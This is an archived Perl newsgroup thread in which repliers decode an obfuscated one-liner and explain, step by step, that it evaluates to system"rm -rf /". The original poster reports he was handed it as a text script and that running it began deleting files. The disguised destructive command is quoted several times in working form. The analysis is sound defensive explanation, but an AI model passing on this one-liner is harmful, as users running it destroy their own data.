Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Programming > Perl > Perl Misc > Perl tricks

Reply
Thread Tools

Perl tricks

 
 
Andrei Koulik
Guest
Posts: n/a
 
      09-25-2003
Can anybody explain me how this command deletes files:
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
-;;s;;$_;see'

 
Reply With Quote
 
 
 
 
Charles DeRykus
Guest
Posts: n/a
 
      09-25-2003
In article <bku8sv$63cvq$(E-Mail Removed)-berlin.de>,
Andrei Koulik <(E-Mail Removed)> wrote:
>Can anybody explain me how this command deletes files:
>perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
>-;;s;;$_;see'



You can use Deparse to get a clearer view:

perl -MO=Deparse
$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
^D

$?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
tr( -/:-@[-`{-})[`-{/"\-];
s//$_;/see;

The evil is lurking in the final double eval. Comment that
line and throw in a 'print' after preceding statements,

....
tr( -/:-@[-`{-})[`-{/"\-]; print;
#s//$_;/see;

Ah, the $_ that the double eval loads up with is:

system"rm--rf-/"

HTH,
--
Charles DeRykus
 
Reply With Quote
 
 
 
 
John W. Krahn
Guest
Posts: n/a
 
      09-25-2003
Andrei Koulik wrote:
>
> Can anybody explain me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


Just change the "s;;$_;see" at the end to "print":

$ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
system"rm -rf /"


John
--
use Perl;
program
fulfillment
 
Reply With Quote
 
David
Guest
Posts: n/a
 
      09-25-2003
Andrei Koulik <(E-Mail Removed)> wrote in message news:<bku8sv$63cvq$(E-Mail Removed)-berlin.de>...
> Can anybody explain me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
> -;;s;;$_;see'


translation:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

tr( -/:-@[-`{-})[`-{/"\-];

s//do{
$_;
};/see;

more translation:

1. this:

$? ?
s/;s/s;;$?/
:
s//=]=>%-{<-|}<&|`{/;

essentially translate to:

$_ = '=]=>%-{<-|}<&|`{';

lookup perldoc perlvar to see what $? holds and you will know why.

2. this:

tr( -/:-@[-`{-})[`-{/"\-];

have a few components. those between '(' and ')' are characters to be translated:

' -/' means: all characters between the space and '/'
':-@' means: all characters between ':' and '@'
'[-`' means: all characters between '[' and '`'
'{-}' means: all characters between '{' and '}'

those between '[' and ']' are characters translated to:

'`-{' means: all characters between '`' and '{'
'/" \-' means just the literal characters.

so you are translating:

!"#$%&'()*+,-./:;<=>?@[\]^_`{|}
`abcdefghijklmnopqrstuvwxyz{/" -

characters from upper string to the lower string.

now notice what $_ is and plug in the translation gives $_ to be:

system"rm -rf /"

3. isn't it clear from now on?

s//do{
$_;
};/see;

'ee' bascially runs the system call via do{}.

4. question: are you going to run that to confirm what i said?

david
 
Reply With Quote
 
Jay Tilton
Guest
Posts: n/a
 
      09-25-2003
Andrei Koulik <(E-Mail Removed)> wrote:

: Can anybody explain me how this command deletes files:
: perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
: -;;s;;$_;see'

Start by running it through the Deparse backend to get rid of some
obfuscating elements, then add some whitespace for readability.

$? ? s/;s/s;;$?/
: s//=]=>%-{<-|}<&|`{/ ;

That puts the string "=]=>%-{<-|}<&|`{" into $_ .

Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
do with anything--I don't know of a circumstance where $? would hold a
true value when the program starts execution.

tr ( -/:-@[-`{-})
[`-{/" \-] ;

That alters the characters in $_.
If you print it now, it will read 'system"rm -rf /"' .

s//do { $_ };/see ;

That's just a hairy way of saying "eval $_" .

So were you aware of the code's malicious nature before running it, or
did something terrible happen?

 
Reply With Quote
 
Andrei Koulik
Guest
Posts: n/a
 
      09-26-2003
Thank all very much.
Yesterday I have parsed it manually how John W. Krahn does, but from
your replies I have learnt some useful things.

Andrei Koulik wrote:

> Can anybody explain me how this command deletes files:
> perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
> -;;s;;$_;see'
>


 
Reply With Quote
 
Andrei Koulik
Guest
Posts: n/a
 
      09-26-2003


Jay Tilton wrote:
......
>
> So were you aware of the code's malicious nature before running it, or
> did something terrible happen?
>

I was asked to debug script for text formation:

cat "test... test... test..." | perl -e
'$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

but I noted neither -n nor -p option is used so I start debug it on
behalf of news user (it doesn't own any files).
But after some steps, lines:
....
rm: /usr/bin/objcopy: Permission denied
rm: /usr/bin/objdump: Permission denied
rm: /usr/bin/ranlib: Permission denied
....
were printed. When I pressed ctrl-c the output is froze but beeping is
started and terminal didn't responsed on any keys.
I didn't knew what happened and so I had to understood what this program
actually does to detect possible injuries.


 
Reply With Quote
 
Jay Tilton
Guest
Posts: n/a
 
      09-26-2003
Andrei Koulik <(E-Mail Removed)> wrote:

: Jay Tilton wrote:
: .....
: >
: > So were you aware of the code's malicious nature before running it, or
: > did something terrible happen?
: >
: I was asked to debug script for text formation:
:
: cat "test... test... test..." | perl -e
: '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
:
: but I noted neither -n nor -p option is used so I start debug it on
: behalf of news user (it doesn't own any files).
:
: But after some steps, lines:
: ...
: rm: /usr/bin/objcopy: Permission denied
: rm: /usr/bin/objdump: Permission denied
: rm: /usr/bin/ranlib: Permission denied
: ...
: were printed. When I pressed ctrl-c the output is froze but beeping is
: started and terminal didn't responsed on any keys.
: I didn't knew what happened and so I had to understood what this program
: actually does to detect possible injuries.

Next time you feel compelled to run a mysterious script like that, you
might want to use perl's -T switch, at the least. In this case, it
would have halted the program with an "Insecure $ENV{PATH}" error before
any mischief could begin.

 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
FAQ 2.17 What is perl.com? Perl Mongers? pm.org? perl.org? cpan.org? PerlFAQ Server Perl Misc 0 04-04-2011 10:00 PM
FAQ 1.4 What are Perl 4, Perl 5, or Perl 6? PerlFAQ Server Perl Misc 0 02-27-2011 11:00 PM
FAQ 2.17 What is perl.com? Perl Mongers? pm.org? perl.org? cpan.org? PerlFAQ Server Perl Misc 0 02-03-2011 11:00 AM
FAQ 1.4 What are Perl 4, Perl 5, or Perl 6? PerlFAQ Server Perl Misc 0 01-23-2011 05:00 AM
Perl Help - Windows Perl script accessing a Unix perl Script dpackwood Perl 3 09-30-2003 02:56 AM



Advertisments